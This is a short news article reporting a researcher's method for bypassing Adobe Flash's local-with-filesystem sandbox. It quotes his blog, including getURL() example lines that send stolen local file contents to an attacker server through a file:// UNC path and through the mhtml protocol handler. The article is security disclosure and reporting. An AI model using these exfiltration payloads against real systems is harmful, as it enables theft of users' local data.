Rios has developed a way to bypass the local-with-filesystem sandbox that Adobe developed to protect local Flash files. The sandbox is supposed to prevent malicious Flash files from stealing data or taking other actions without the users’ knowledge.
In his blog, Rios explained how to use a specific protocol handler to access a local Flash file and pass the contents to an attacker server.
“The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server. For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like: file://\\192.168.1.1\stolen-data-here\...In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists. If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win.”
Rios added: “There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);”
The researcher said that he learned two lessons from developing this method to bypass the Adobe sandbox: “One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous. Two, protocol handler blacklists are bad.”
Software vendors are increasingly using sandboxes to prevent hackers from using applications for attacks. Apparently, sandboxes are not fail-safe security measures, as Rios' method demonstrates.